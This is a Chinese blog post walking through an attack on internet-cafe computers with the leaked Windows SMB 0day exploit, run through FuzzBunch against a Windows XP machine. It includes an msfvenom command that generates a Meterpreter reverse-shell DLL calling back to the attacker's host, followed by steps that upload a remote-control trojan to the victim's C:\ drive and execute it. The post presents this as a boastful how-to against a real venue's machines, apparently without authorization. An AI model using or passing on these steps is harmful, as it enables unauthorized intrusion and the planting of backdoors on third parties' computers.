Hack NetBar by Windows SMB

这才是日网吧的正确姿势!


一早起来被 Windows SMB 远程溢出的0day 闹了群.早上有事,晚上到了网吧复现了下.

  • 如何安装所需环境,这里我就不再叙述一遍,可以看看Luan表哥的复现,很详细.有几点需要注意的:

    • Luan’s Blog: http://lu4n.com/
    • 上面博客经给出了Python26 和 pywin32 64位的
    • 注意,上面博客具是适合64位系统用的.
    • 上面博客中有一个修改fb.py 的步骤,千万不要忘记
  • 好戏开始

    • 因为我的目标机是32位的Windows XP 所以这里开始再演示一遍,如果目标机是64位的,可以跳过这里。

    • 用msf生成dll,并填写在fb里.

      本机IP: 192.168.1.25
      目标IP: 192.168.1.201
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=6666 -f dll > msf.dll
      

      netbar 01

    • 上面的设置好后,暂时不要开始攻击,现在开始配置msf.
      netbar 02

    • 先开始用msf,等待回话连接.然后开始用fb攻击,得到一个回话.
      netbar 03

    • 生成一个远控马,然后用upload 上传本地的远控马,到主机的C:盘根目录

      upload C:\\Users\\Administrator\\Desktop\\stranded\\s.exe c:\\\
      

      netbar 04

    • 进入shell,运行上传过去的远控马.
      netbar 05

    • 然后远控上线,嘿嘿嘿.
      netbar 06

  • 最后的全家福
    netbar 07